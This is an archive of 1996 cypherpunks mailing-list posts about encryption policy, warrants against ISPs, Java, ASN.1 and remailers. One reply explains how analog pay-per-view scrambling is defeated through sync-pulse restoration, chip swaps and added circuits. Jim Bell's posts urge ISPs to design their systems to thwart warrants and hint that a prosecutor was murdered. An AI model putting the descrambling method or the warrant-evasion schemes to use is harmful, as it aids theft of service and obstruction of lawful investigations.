far more credible if you prefaced your sweeping statements about what a 
government does with, "Yes, it's illegal, but they..."  


>> Ideally, this would be done automatically 
>> every time a person calls his ISP, although the software to do this probably 
>> doesn't exist yet.  The result would be that whenever the target was NOT 
>> connected to the ISP, there would be no information on the ISP's system that 
>> could be decrypted by the ISP operator.
>
>Again, this still subjects the account holder to fines etc. 

You haven't explained why.  You have appeared to accept the premise that the 
ISP's system is automatically programmed to make it impossible for the ISP 
to provide information, and you've just ADMITTED (and yes, it's really an 
admission!) that a judge would be inclined to abuse his position in such 
circumstances.  As far as I can see, the American Revolution was fought over 
violations of freedom substantially less severe than these.

>God help him 
>if he can't produce the desired information.  He's likely to spend quite 
>a long time in jail until the judge is convinced that he's telling the 
>truth when he says "I threw away the key."

Tell me, honestly:  Do you genuinely believe that the average citizen (or 
ISP operator) is 
going to feel any more generous to the government's desire to regulate 
encryption if he's told that he may some day be held in contempt for failing 
to  provide what he knows he cannot provide?  

Further, one of the provisions of the Leahy bill seems to be that key-escrow 
is OPTIONAL.  It is, therefore, presumably true that the key-owner can write 
whatever conditions into that escrow arrangement he's inclined to add.  
Suppose for a moment the key-owner reads your suck-up commentary and 
believes you:  He'd have to be a fool to use a key-escrow agent that was 
within the jurisdiction of the US or treaty agreements, OR he'd insist on 
using encryption to hide the keys.  That being the case, pressure on the 
key-escrow agent is totally useless, as least with regards to getting the 
actual key.  Obviously, then, the only purpose of such strong-arm tactics 
could possibly be is to deter any key-escrow agents that offer a _secure_ 
key-escrow service.  But we've reached a contradiction:  Is key-escrow 
voluntary or isn't it?

You seem to have forgotten the subject of this thread.  The appropriateness 
of any particular piece of legislation depends not exclusively on what it 
says, but in fact how it will be abused by crooked judges and prosecutors.  
Every time you open your digital mouth, you further destroy whatever 
credibility those guys have in the eyes of the public.  At this point, 
anybody with a brain in his head should be terrified of giving the thugs any 
more power to abuse.

>> This would be one of those inventive future uses of encryption, well beyond 
>> plain vanilla PGP, which we must assure ourselves will be developed.  The 
>> kind of thing you dread, obviously.
>
>I don't dread it at all.  I simply recognize the limited protection it 
>affords the evidence concealer.

Actually, its protection against the individual is excellent.  What you've 
done, essentially, is assert that the government will abuse any and all 
people who contract with the individual in order to deter them from entering 
into useful contracts which are secure against government intrusion. This 
worries me, and should worry anybody else.  It's somewhat equivalent to the 
government holding your nearest neighbors responsible for any crimes you 
commit, which will induce them to spy on you to ensure that you're not doing 
anything that they'll later get it trouble for.  Look up the term "bill of 
attainder" if you don't understand.

>I certainly won't endorse moronic schemes that are so out of touch with 
>practical and legal reality so as to be laughable.  

That's odd.  I've debated all comers, including clueless ones such as 
yourself.  I've never run across a person who identified himself as a 
lawyer, and put even the smallest amount of effort into debunking my claims. 
 I don't claim that everything I've said must be the truth; rather, I've 
pointed out that it's a good estimate and I've asked for clarifications and 
corrections. Nobody ever SPECIFICALLY challenges me on the big items; mostly 
I get statements like the one you've made just above which are so laughably 
non-specific that it's hard to know whether you seriously expect me to be 
satisfied with it.

>The what's the purpose of your secret-super-duper "rosebud" warning?  In 
>the absence of evidence/information availability to law enforcement at 
>the ISP, the account holder will be directly accountable.  Is this a 
>better solution?
>
>You've now changed the structure of your "protection" scheme four times 
>to duck my criticisms. 

Actually, what I've done is poked four _different_ large holes in your 
arguments  I haven't presented these as being part of the same claim.  I don't have to.


>> No, an even better defense is to make it absolutely impossible, as a matter 
>> of business practice, to assist the police with any kind of an 
>> investigation.
>
>On the part of the ISP, this is possible.  A secret "rosebud" tipoff is 
>not the way to do it. 

Why not?  If it's undetectable, then there's no risk to the ISP even if you 
assume that he's not entitled to inform the target.

> Your constant encryption option is a bit better, 
>but still subjects the account holder to an investigation where the ISP 
>is compelled to cooperate with the authorities in secret and intercept or 
>record the computing session in real time. 

This is rich!  You're saying the ISP has to CHANGE HIS BUSINESS PRACTICES to 
ADD A FUNCTION not previously provided?  Hey, if there is any argument in 
favor of kicking these bastards out of office, feet first, it is this.  A 
search warrant, even a wiretap warrant, is NOT a "do anything and everything 
we tell you no matter how much time it takes and how much money it costs" 
order.   The reason the government wanted that Digital Wiretap act passed 
was because (supposedly) there simply wasn't the technology in place to do 
the kind of wiretaps they claim they wanted.  There was no hint, BTW, that 
any judge was fining and local telephone company for failing to do a tap 
because the equipment wasn't designed to do that.  (in fact, I've read that 
the thugs were forced to PRIORITIZE their taps, and to thus accept the 
existing limitation)  If what YOU claimed was possible, then that Digital 
Wiretap Act would have been unnecessary:  The government would have simply 
leaned on the phonecos to force them to install this equipment anyway.

I agree that an old-line company like AT+T or IBM or such might have 
complied with such an order, simply to stay on the government's good side, 
but to assume that such a broad interpretation will fly in the modern era is 
laughable at best.

>Unfortunately, records can only be completely destroyed in a pre-emptive 
>way when they are of no use any longer.  This, again, ignores the 
>possibility of real-time investigation or informers.
>
>  While courts will look askance 
>> at it when it does not appear to be a regular business practice (say, the 
>> company gets sued today and they have a mass shredding tomorrow) there is 
>> nothing wrong about regularly making past records unavailable by shredding, 
>> burning, erasing, or by any other method. 
>
>Once suit is filed there is.

Only if they are under discovery procedures.  If I file a lawsuit again, 
say, the local phoneco, that doesn't mean that their entire 
records-destruction system must be put on hold.  Only the material 
specifically needed and requested.

>> Making those records SELECTIVELY unavailable by encrypting them with 
>> somebody else's public key and keeping them has probably never been tested 
>> in court, but if the business contracts this ISP regularly signs have this 
>> as a provision of doing business, the court can't squawk after the fact.  
>
>No, instead, knowing of this provision, any plaintiff or prosecutor will 
>apply for a TRO to preserve evidence before ever filing for a warrant.  

It's pretty hard to TRO a microprocessor.

>> After all, the ISP might have simply erased the files, keeping them from 
>> being accessed by ANYBODY, including their "owner."
>
>This argument will go over real well in court.

It really doesn't matter how well it "goes over."  Once ISP's start using 
pre-emptive anti-warrant procedures, I predict that they will become 
standard in the industry:  "Due diligence," as it were.  Given a choice, I'd 
much rather use an ISP that was willing to make it as difficult as possible 
for the government to get what they want.  If the ISP WANTS to do this, they 
can.

>> In any case, I think it's fair to hold an ISP to his word and contract.
>
>Contracts are void to the extent they are illegal. 

Note to the rest of you:  Unicorn is abusing the term "illegal."  There is a 
difference between an "unenforceable" contract and one which actually is a 
crime.  Unicorn's trying to mix up these two distinctions.  Just because a 
contract can't be enforced in court because of legal bias, doesn't mean it 
can't be enforced "extra-judicially."


>> If you can repeatedly describe, in nominally accurate terms, how abusive the 
>> government has become and NOT oppose its actions with every fiber in your 
>> being, then YOU have made yourself part of the problem.
>
>Who said I didn't oppose it?

You only oppose it when PAID to!  You have all the business ethics of a 
whore.  Actually, maybe less.

>> Remember that prosecutor who died in Boston a few months ago?  You 
>> know, the one who made the national news?  I'm still waiting to see how 
>> that one came out, but I suspect they will never be able to prove who 
>> did it, and may not even be able to find out.
>
>Parties who believe Mr. Bell might have been responsible are invited to 
>call the Boston Police and provide an anonymous tip.

Don't try to be funny. You're not very good at it.   I try to follow all 
these kinds of "weird" cases that (strangely) make the national news for 
reasons that are not clear at the time.    I figure that the reason they 
make the national news is that somebody knows something about the case which 
makes it worthy of the attention, but they can't quite say it because they 
have no proof.  The word gets around, I'm sure.

>> Except that in a court room, the decision maker is PAID by a party to the 
>> case, the government.  That sounds like a classic conflict of interest 
>> to me.
>
>Yadda yadda yadda.

That's the best this guy can do!   (unless he's paid...)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 20:51:54 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic locksmiths are watching you (Belgium's ban on PGP)
Message-ID: <m0u2u7W-0008xVC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:02 PM 3/29/96 -0800, Tim May wrote:
>
>This seems like an interesting glimpse into the future of crypto banning
>around the world. France's ban on unapproved crypto has been
>well-publicized, but I hadn't heard until this message that Belgium has
>joined in.
>
>The reference to Belgium's wiretap law and "But little-known sections of
>the law state that  all cryptograhic systems aimed at protecting privacy
>must not block these wiretaps" suggests that we ought to look _very_
>closely at our own Wiretap Act (aka Digital Telephony) for similar
>language.

What I'm surprised about is that I would be criticized for being suspicious 
(as Declan McCullagh was, below) for doubting the motivations of people who 
propose crypto bills:

At 08:35 AM 3/29/96 -0500, Declan B. McCullagh wrote:
>Two observations:
>
>* Jim Bell would be unduly suspicious if _anyone_ introduced a crypto
>bill in Congress. I'm not surprised that here on conspiracypunks someone
>would be raising alarums without knowing what they're talking about.


I think it's obvious that governments around the world have a very poor 
record of responding "well" to encryption with any kind of acceptable 
legislation.  Arguably, laws should exist for the benefit of the public, but 
what's happening is that governments are using their authority to try to 
restrain the political consequences of technical developments.  I see no 
benefit to the public in laws against encryption, and certainly no net benefit.

We should be particularly suspicious of any hint of a pan-European ban or 
control of encryption, because that is exactly the kind of development that 
could usher in a secretly-negotiated treaty that might be argued to be 
binding on the public.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 22:44:19 +0800
Subject: No Subject
Message-ID: <199603291444.WAA12232@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


Here is an abstract of a report the German newsmagazine Focus
published on March 11, 1996 (p. 16) - "Spaete Ermittlungen gegen
Techno-Spione" (late/belated investigations against technology
spies). I do not include a translation of the whole original text
for copyright reasons.

"Specialists of the German Federal Police Agency (BKA) have decrypted
44 floppy disks from the former [East German] Ministry for State
Security" (MfS). A defector had handed over the floppies to the
German Federal Intelligence Agency (BND) in spring 1990. The disks
contain information on East German spies in former West Germany.
Judicial inquiries against 29 suspects have started now. Apparently,
the BKA got the data no sooner than 1994. This is because the BND did
not tell law authorities about the floppy disks. German federal DAs
learned about the data in late summer 1994 by chance. The article
does not say whether the defector came over with the keys. - Probably 
not, otherwise prosecution should have started much earlier. 

It is likely that the extremely paranoic MfS used a cipher and a key
length it believed to be sufficiently strong. According to Bruce
Schneier's Applied Cryptography East Germany was quite aware of DES,
it even produced DES chips. Another possibly strong algorithm used in
the former Soviet block is GOST (a block cipher derived from the
concepts of DES, also described by Schneier). Let us assume BKA
specialists have broken the code using a combination of
cryptoanalysis, brute force and good luck. They are policemen, not
espionage professionals. Further, the BKA is much smaller than the
FBI. Imagine what code breaking capabilities a well-funded, big
intelligence agency should have then! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 30 Mar 1996 18:31:57 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Crack???
In-Reply-To: <2.2.16.19960330050617.3fdf7540@tiac.net>
Message-ID: <199603300650.WAA06087@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


 > This just appeared in alt.security.pgp.  Is there anything
 > to it?  I'm dubious. 

Gee - Is it April 1st again?  Time to troll the newbies in all
my favorite newsgroups. 

On a more serious note, does anyone know what is happening 
with Arjen Lenstra and RSA-130?  Last I heard back in late 
December, FAFNER, the magic WWW sieving dragon, had collected 
more than enough relations from participants to yield a 
factorization.  Surely they have not spent an additional four 
months crunching the big boolean matrix at CWI.

This is an important experiment, since it will yield a robust
estimate of the time required to break 512 bit PGP keys using
the best available factoring software.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 30 Mar 1996 17:27:14 +0800
To: rollo@artvark.com (Rollo Silver)
Subject: Re: java security
Message-ID: <2.2.32.19960329165034.00693330@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:44 PM 03/29/96 -0700, rollo@artvark.com (Rollo Silver) wrote:

>I'd like to hear from coderpunks/cypherpunks having ideas about how to
>break it, especially if you don't have the time/energy to pursue the idea
>to fruition yourself.

I wonder if it's possible to _subvert_ Java. That is, have site "A" send
along some modifications to a Java class, so that when the user logs into
site "B" (which calls that class), Nasty Things Happen. What site "A" does
raises no alarm flags _until_ site "B" trips the trigger - making it look
like site "B" is the Bad Guy.

(WARNING! CDA Violation!) Hell, you might even be able to spread the
modifications around some, so that it's even less obvious where they were
done. Maybe even use the technique to modify Java itself, thus disabling
security controls.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVv4Y8VrTvyYOzAZAQEt3wP+JBpJtTLoBLuMSqWpl6b8qSsIiIVXi6fh
9JiK9xfOEptPljW1Ca/KhHNmX8wHpUyR8U8vU4XZKraAAqcGiPlHO4ojuaJfa87I
LgkKGuSlsmaA7VSIZc7NkjH87B+IRhMgk5IkAE15StGyDAh9ugEm1e8X0PZjcDV0
HgokmdQMppA=
=XHYT
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 29 Mar 1996 22:50:26 +0800
To: "Vincent S. Gunville" <vingun@rgalex.com>
Subject: Re: Councilman/Usenet porn case...
In-Reply-To: <315AB3E4.41B6@rgalex.com>
Message-ID: <Pine.ULT.3.91.960328123538.21495B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, Vincent S. Gunville wrote:

> Here is an example of what anonymous remailers can 
> do.......

I'm re-forwarding you the second half of this article, because it seems 
clear that you didn't read the whole thing the first time.

> >    Suponcic, being a public official, knew his way around the local
> >    police department, and soon a detective started pounding the Net. By
> >    tracing the header information on the Usenet postings, the detective
> >    determined--O.K., this part is murky, we admit--that the messages had
> >    originated in Ohio, passed through Florida Online, an Internet
> >    provider in the Sunshine State, and then through anon.penet.fi, a free
> >    E-mail remailer service based in Finland that allows Internet users to
> >    post messages anonymously.
> > 
> >    The identity of the poster was, and is, unknown, though Suponcic has
> >    his suspicions. "It's my personal belief that the root of this is
> >    political," says the councilman, who had to get an unlisted telephone
> >    number and whose wife now wants to move.
> > 
> >    On Feb. 6, at Suponcic's urging, the Willowick city council passed a
> >    resolution asking the state and federal governments to close the
> >    "loopholes" that allowed anonymous remailers to operate outside the
> >    authority of U.S. law-enforcement officials. "Once you've achieved one
> >    of these anonymous identities, you're dangerous, and there's no way
> >    law enforcement can track it," Suponcic says. "The animal's out of
> >    control."
> > 

I know you read at least this far, but keep reading...

> >    Still not content, Suponcic contacted Steven LaTourette, the U.S.
> >    Congressman who represents his district. LaTourette's staff suspects
> >    that the problem lies with Julf Helsingius, the Finn who runs the
> >    anonymous remailer. They wrote a letter to the Finnish ambassador and
> >    sent copies to the Secretary of State and the chairman of the House
> >    Committee on International Relations. The State Department agreed last
> >    week to look into the complaint.
> > 
> >    But here's a reality check. The Finnish remailer could not have been
> >    used, since anon.penet.fi no longer transmits binary image files.
> >    Jerry Russell, who runs Florida Online and who looked into the case,
> >    says he figures the whole thing was a relatively simple prank called a
> >    sendmail spoof, in which the prankster posts a message with a phony
> >    return address. He says the Willowick police never produced a copy of
> >    the posting for him so that he could unravel the tangle for them.
> >    Indeed, when the policeman called, "he didn't really understand what
> >    he was trying to tell me," says Russell. "The average Joe Blow police
> >    detective doesn't know flip about the Internet."
> > 
> >    Neither does the average public official. And that, friends, is why
> >    stuff like the Communications Decency Act--the Christian Coalition's
> >    attempt to remove pornography from the Internet--sails through
> >    Congress.

Allow me to adjust your point to "Here's an example of what sendmail 
exploits can do".

Kathleen M. Ellis     http://zeus.towson.edu/~kelli/     kelli@zeus.towson.edu
Diverse Sexual Orientation Coll.  Towson State University  DSOC@zeus.towson.edu
"I can't help it, I'm a born lever-puller"
							-Ringo
						     from "Yellow Submarine"
"Your friends are really just enemies who don't have the guts to kill you"
       							-J. Tenuta
"Obscenity is a crutch for inarticulate motherfuckers."
							-Fortune Cookie
						Courtesy of Linux 1.3.45	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Weisman <weisman@osf.org>
Date: Fri, 29 Mar 1996 22:54:58 +0800
To: janzen@idacom.hp.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <9603281530.AA22135@oberon.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Mar 27, 1996, Martin Janzen wrote:

    Another "RPC" comes from the Open Software Foundation, who
    unfortunately chose the same acronym for the remote procedure calling
    mechanism in their Distributed Computing Environment (DCE).  This DCE
    is a part of the OSF/1 operating system, but implementations are
    available for many versions of UNIX, often as a separate product or
    option.

This is a semi-common misconception, there is no relationship between DCE
and OSF/1.  OSF/1 was one of the reference platforms during the original
DCE development, but so was SVR4, AIX and HP/UX.

Except for parts of DFS (the distributed file system), all of DCE is
user-mode code and ports easily between un*x platforms.

Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sun, 31 Mar 1996 00:39:55 +0800
To: cypherpunks@toad.com
Subject: RE: Why Americans feel no compulsion to learn foreign langua
Message-ID: <009A014B.B8D6C960.673@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


More fuel for the fire: I've noticed that I've been able to follow this entire
thread, and my multi-lingual skills are only as extensive as beer-ordering and
restroom-finding in a few languages.

<Duck>Well, I thought it was an interesting point...  :)</Duck>

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 29 Mar 1996 23:10:01 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Let's *NOT* "Raise their Awareness"
In-Reply-To: <ad7f43b629021004db07@[205.199.118.202]>
Message-ID: <315AA025.795A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> By the way, this is a wonderful story to tell about the stupidity of
> government, but, alas, most of it is urban legend. The Tennessee or
> Kentucky (I forget which) state legislature did not actually pass such a
> law....it was merely _proposed_ by some particular legislator, and then
> never acted upon.

"A history of pi". P. Beckman. Golem Press, CO, 1971 

If you haven't read it, do so.  A wonderfully opinionated little book.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Mar 1996 23:15:34 +0800
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <Pine.SOL.3.91.960328154547.17117D-100000@orb>
Message-ID: <Pine.SOL.3.91.960328094418.7389F-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, Eric Young wrote:

> On Wed, 27 Mar 1996, Phil Karlton wrote:
> > My apologies for misunderstanding what you wrote. It could be that I am
> > oversensitive on the issue since SSL has been "accused" of being
> > proprietary in many forums.

A lot of the aura of "proprietariness" of SSL comes from the early 
history, which I don't think we need to go into again.

> ASN.1 BOOLEAN type, and I have only just been able to get hold of the 
> actual full specification of X509v3.  The UNIVERSALSTRING type?  Only 
> found out about it's existance 3 days ago.

DER BOOLEAN :  [UNIVERSAL 1]
	
	true - 0x01 0x01 0xff
	false- 0x01 0x01 0x00

I never had any problem getting hold of ASN.1 information for free (I 
even managed to get a change into the PER spec without being a government).
Marshall Rose's "The Open Book" really helped.  protectzia rules, even if 
Tim doesn't know what it means :)

Mind you, when I was working on z39.50 I had tremendous fun working on 
debugging when just about everybody had hand-rolled their own compilers 
or codecs, and nobody actually had a real copy of the ASN.1 specs 

The real problem with asn.1 is that it is so easily abused; unless you 
stop and think about what the spec you're writing is going to look like 
in terms of structs and bits on the wire it's way too easy to come up 
with something completely unimplementable. 

When used correctly it can be a life saver, and when used with PER, the
encodings generated are often way better than you'ld end up with if you
designed the encodings manually, especially for modern cache
architectures; however if the spec is fucked up there's not a lot you can 
do. 


Hmm - hi abuse potential - now there's something that really needs federal
regulation. 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 23:18:49 +0800
Subject: No Subject
Message-ID: <199603291518.XAA12287@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


> My question is when I see how RSA encrypts using PKCS
> [desc. deleted]
> How to solve this??

You don't.  Blind signatures only work with "pure" RSA.  You cannot
use PKCS encoding to perform blind signatures.  PKCS nullifies the
multiplicity that is required for these blinding techniques to work.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 29 Mar 1996 23:20:11 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <2.2.32.19960328050605.00698058@arn.net>
Message-ID: <199603281828.KAA10403@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"David K. Merriman" <merriman@arn.net> writes:

 > At 01:34 AM 03/28/96 +0000, you wrote:

 >> I've been looking for a file on how to make PPV
 >> descramblers and havn't found any. Commercial descramblers
 >> cost around $200 base price. If anyone has a file on how to
 >> make them please e-mail me one.  Thanks.

 > This is cypherpunks. Not Cable-TV-Piracy-Punks.

ObCrypto: Scrambling TV signals sometimes makes use of
encryption, so perhaps a brief discussion of how this is done
could be tolerated.

If you are talking about recovering signals from completely
encrypted digital MPEG-2 streams, such as those used by the DBS
folks, you are probably out of luck.  The relevant processing in
the decoder exists on a small card which has so far resisted
attempts at reverse engineering.

As far as analog signals are concerned, the "scrambling" of the
video only involves the clipping of the horizontal sync pulses.
This causes the picture to tear and the color burst to be missed.
So you get a funny torn picture with odd colors in place of the
original.  Sometimes, the set will momentarily lock on to
something in the picture in place of the missing sync and you
will get a reasonable picture for a few moments.  Kids often
watch porn channels for hours waiting for such an effect to
occur.

The usual way of transmitting the missing sync information is to
place an appropriately tuned 15,750 hz subcarrier on the sound
channel.  If you pick this up, and use it to add pulses back onto
the video, you will again get a signal your set will correctly
process.

There are a variety of techniques for scrambling audio.  The most
expensive is to DES encrypt the sound and place it in the
horizontal blanking interval.  The regular sound channel can then
be used for advertising.  This requires a bit of processing at
both ends, and is generally used for satellite to ground
transmission of cable signals.  The other common method is to
modulate the sound on a subcarrier, usually the one transmitted
in phase with the missing sync.

In most cable systems using addressable decoders, nothing is done
to the sound at all, and the box simply mutes the set if its
address is not in the list of authorized users for that channel.
Persons viewing a PPV without a cable box will get a scrambled
picture, but perfectly normal sound.  This is commonly referred
to by people who listen to PPV events without paying as watching
in "scramblevision."

A hostile attack on such a system can be mounted in a number of
ways.  One can simply mung the set top box to restore sync on all
channels unconditionally, either by replacing a single chip with
a black market substitute, or by doing some surgery on the
electronics.  Once can also construct a number of simple circuits
which will yank the subcarrier off the sound channel, and use it
to trigger a pulse generator which gets added to the video.  You
can even stick one of these in your TV set to render it truly
"cable ready."

Of course, once television transmission goes completely digital,
and strong encryption is used on both audio and video, the
opportunity for such simple attacks will vanish.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 29 Mar 1996 23:26:06 +0800
To: cypherpunks@toad.com
Subject: java: vending machine software (long)
Message-ID: <199603282211.OAA15109@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




Java seems to be catching on in a big way (only a few months ago,
the hook-line-and-sinker interest by MS would not have been conceivable)
and seems to be leading to some radical new programming and
cyberspace paradigms. I thought I would try to anticipate some
of these future developments. what does it mean that "the network
is the computer"?

there are three very important aspects of Java in my view that make
it much more than your everyday programming language, and all of
these could be classed as "revolutionary" if they stay airtight
and hold up to the rigors of worldwide keyboard banging. not all of these are 
recognized for their importance or potential future significance
at the moment. 

1. it can be easily translated across platforms. this translation
is far more robust and reliable than say the supposed portability
of "C" which is in fact not very portable and whose "portability" seems
largely an illusion at times. complicated makefiles with a zillion
special cases are far from seamless. Java has reached the level
of almost "foolproof portability". of course there are some minor
sacrifices (such as possibly) efficiency. however Java has always
been designed with high efficiency in mind.

2. the security aspects are extremely significant. the end design goal
of course is that the end user should never have to worry about whatever
software he downloads-- he can run it all knowing it is theoretically
impossible for it to screw up his system. all other schemes, such
as a "software certification authority" which e.g. MS has been
pursuing, seem inferior to some degree. 

3. the whole concept of an "applet" is again very critical to the
Java design. the name connotes something that is trivial to run, and
may be tiny. i.e. one might be running tiny little programs all day
instead of monster applications that we have right now. the philosophy
is of "lean and mean" vs. the massive dinosaur. one way to state it
would be to say that the applet is a program with "small granularity".

==

now, all the above elements are present in various languages and
platforms, but Java has focused on refining them to the utmost degree,
to the point that every nonprogrammer can use a Java application without
worrying about compilation or whatever. this goal of "increased sophistication
for the less sophisticated" has always been foremost in software
development, and alas has largely been lost in the minds of many 
designers. (look how many years it took MS to come up with the
concept of "plug and play" when it would seem like an obvious
feature from the very beginning of computing). the process of
complex program translation/porting
has been reduced to the minimum of clicking on a hypertext button.

 look how many countless
man-lifetimes have been wasted by beginners trying to hack through
their autoexec.bat, config.sys, and whatever else silly configuration
files the software requires them to tweak. look at the lifetimes wasted
on bad IRQ settings. what utter shamefulness, to think that all this
could have been averted by a few farsighted designers who took the
time to "do it right" the first time around and develop standards
that didn't require a burden on the human, but instead put it where
it belonged: on the designer!! those who argue, "yes, but as soon
as you learn this stuff its not a big deal" are completely missing
the point.

the point that I am getting to is that I think we are entering a new
era of "seamlessness" everywhere in cyberspace, and java is going to
be a big part in helping that goal be achieved. we are going to see
our machines rarely ever ask us for ridiculously arcane or abstruse
information such as IRQ settings, IP addresses, or require
us to maintain it--things we should not have to care about as humans.
its really amazing how often designers simply replace one set of 
problems with another set, and these people are increasingly going to
have to get their act together in the future as people simply don't
tolerate poorly designed software that requires them to do things
they shouldn't have to do.

==

Java reminds me in many ways of the Unix operating system. now I'm
not claiming a parallel in the "use" of the language, but the
design goals are somewhat similar. Unix was broken down into very
fine "pieces" of code that could be interchanged and plugged into
each other in the same way that subroutines or classes can be 
shared today. the obvious goal is to have the ability to string
pieces of code together, no matter how small or how large. this
goal has largely eluded software programmers. it seems that after
code gets to a certain size it becomes far less able to be used
as a module or subroutine to other code. it seems one has to
constantly invent new languages to string all this code together
(machine language, C, then shell scripts, then an operating system
on top of that, then a network).

 I believe we are moving toward an environment in which code
becomes incredibly interchangeable. the entire cyberspace will
be seen in the same way that we see our own local computer system
today. cyberspace will be thought of as an enormous code library
that one can "link to" in any way one likes with one's own code.
the distinctions between operating system, computer languages,
shell scripts etc. are all going to blur into one massive, 
unified algorithmic structure.

"object oriented programming" is slowly moving in this direction.
it does seem to be that the basic unit of software is not a
"subroutine" or an "application" but an "object" and that this
paradigm can be utilized in almost any situation, at any level.

Unix has what I describe as "fine granularity" and was designed
purposely and almost fanatically to have this feature. in short it
is the philosophy that no code is an island and no matter what 
hierarchy of code one is talking about, from subroutines all the
way up to complex applications, standards should exist that let
it all "interoperate" in automated fashions. 
 a shell script is merely a way of treating
large pieces of code as subroutines. (one can get their exit
status, pass parameters on a "command line" etc.)

Unix succeeded in bringing the "interchangeable code" concept up
higher in the hierarchy to shell scripts and OS utilities etc.--
but it had to keep inventing new languages at every level to
do so.

to say that Excel "interoperates" with some other software seems
deceptive, if one is using the term in the same way it was
used in Unix. the user has to click around in menus to accomplish
what they want; whereas the situation of making the software so
that it can be called as a subroutine from code requires an entirely 
different design. when Excel began allowing all its features to
be called from Visual Basic functions, such that a series of mouse
clicks and operations implied a particular Visual Basic program,
is the direction I am referring to.

today we see code as something hiding behind user interfaces. but 
increasingly in the future, we are going to be able to see the
code itself and view the user interface as simply a kind of
"grafting" on top of it. it is a sort of "handle" that lets one
access the code. there are other "handles" that can be created to
use the same code, such as a specialized language, subroutines that
name the code, or objects. generally objects are going to win out
in the future as the "thing" that describes all code. the object
paradigm does come very close to the goal of interchangeable software
parts. increasingly the objects that hide behind complex applications
are going to become "visible" to the end user who can combine them in
novel ways. the analogy I like to use is that the "hood of the car"
can be opened to let people to tinker with the engine.

==

when one thinks about this, I think it becomes clear that we are going
to see many, many new standards for code communication in the future.
if we don't want all these java applets to be isolated, we are likely
to see many standards emerge that allow people to write applets
that "fit into" various places in a sort of "plug and play" 
approach. in Unix, the standards that were devised were shell scripts
and command line parameters. much effort went into trying to deal
with compatibility of command line arguments and that kind of thing.

these standards will tend to define things like "the standard methods
that [x] java widgets must support, and in what ways". I expect
to see a lot of these standards be developed and proliferate.

in fact, musing on all this reminds me that it seems to me the
heart of computing involves creating standards and interfaces, 
and that very few computer languages address this aspect of
computation. I'm toying with the idea of inventing a computer language
that actually manages standards. (future posts on this will probably
go to coderpunks)

==

now a few words about something I talked about in the title, or 
"vending machine software". I imagine we are going to see a whole
new paradigm for software use in the future that is going to absolutely
baffle companies used to the old paradigm, and who built their
kingdoms on it, the most obvious being Microsoft.

the key concept is to combine cyberspace, digital cash, microcurrency,
applets, and interchangeability into a new complex holographic recipe. 
imagine in the future that massive single, "circumscribed" 
applications such as Excel
become more rare, and instead what develops is an incredible variety
and diversity of applets around the world.

 I suspect that in the
future, people will use software something like the way vending 
machines work. you look around, pick the exact thing you want in the moment,
and pay a pretty small fee. you may come back later and pick something
else out. eventually I think cyberspace is going to look like one massive
application that one can click anywhere to do anything. anyone will
be able to put their own "code" into this massive vending machine.
